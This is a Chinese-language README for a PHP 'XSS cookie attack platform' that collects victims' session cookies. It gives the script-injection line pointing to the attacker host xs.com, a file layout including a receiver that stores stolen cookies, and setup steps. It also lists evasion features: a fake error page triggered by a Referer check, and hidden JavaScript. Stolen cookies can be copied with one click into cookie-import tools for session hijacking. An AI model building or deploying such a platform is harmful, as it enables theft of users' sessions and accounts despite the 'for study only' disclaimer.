xss个人攻击测试cookie管理平台

php写的个人研究测试用的 xss cookie 攻击管理平台,开源出来

由于在实际测试中需要非常高的执行速度，所以并没有采用框架

本地测试

虚拟主机域名:xs.com

<script src="//xs.com"></script>

任意网页中插入以上代码

仅用于学习交流，禁止用于非法行为，后果自付

目录结构

www  WEB部署目录（或者子目录）
├─admin                 后台目录
│  ├─api.php            删除记录，与改变数据状态的请求
│  ├─auth.php           登录认证
│  ├─function.php       分页类与日期格化函数
│  ├─login.php          后台登陆
│  └─web.php            后台管理主页
|  
├─asset                 资源目录
│  ├─common.css         样式文件
│  └─error.gif          图标
│  
├─mailer                邮件类,本项目中默认未使用到可删除
│
├─cnzz.php              xs接收地址文件,用于把接收到的cookie送入数据库
├─config.php            配置文件，配置后台登录用户名，密码，数据库,以及表名
├─index.php             网站首页
└─xss.sql               默认数据库，自行导入

使用

• 导入xss.sql到数据库
• 正确的配置config.php
• 虚拟主机的默认首页名，指向index.php
• 正确的配置index.php中 js代码的接收地址,为了提高运行速度并没有在config中配置xs接收地址

功能

• 浏览器访问主页，检测HTTP_REFERER,直接地址栏输入访问，返回错误提示 伪装
• 只有在源代码中点击script链接才能查看到js代码
• 后台管理中心点击[cookie]可以一键复制，导入到editthiscookie等工具中使用

So 然而并卵

当今的互联网对xss的防范已经做得比较到位了，一般稍微像样点儿的框架都做了防护。只有测试一些古老的asp,或者一些程序员偷懒不做过滤的